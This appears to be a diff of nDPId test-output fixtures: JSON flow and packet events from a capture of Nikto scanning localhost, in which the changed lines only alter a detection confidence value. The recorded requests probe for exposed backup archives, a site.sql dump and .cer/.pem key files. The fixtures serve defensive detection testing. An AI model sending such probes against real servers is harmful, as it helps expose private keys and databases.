+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 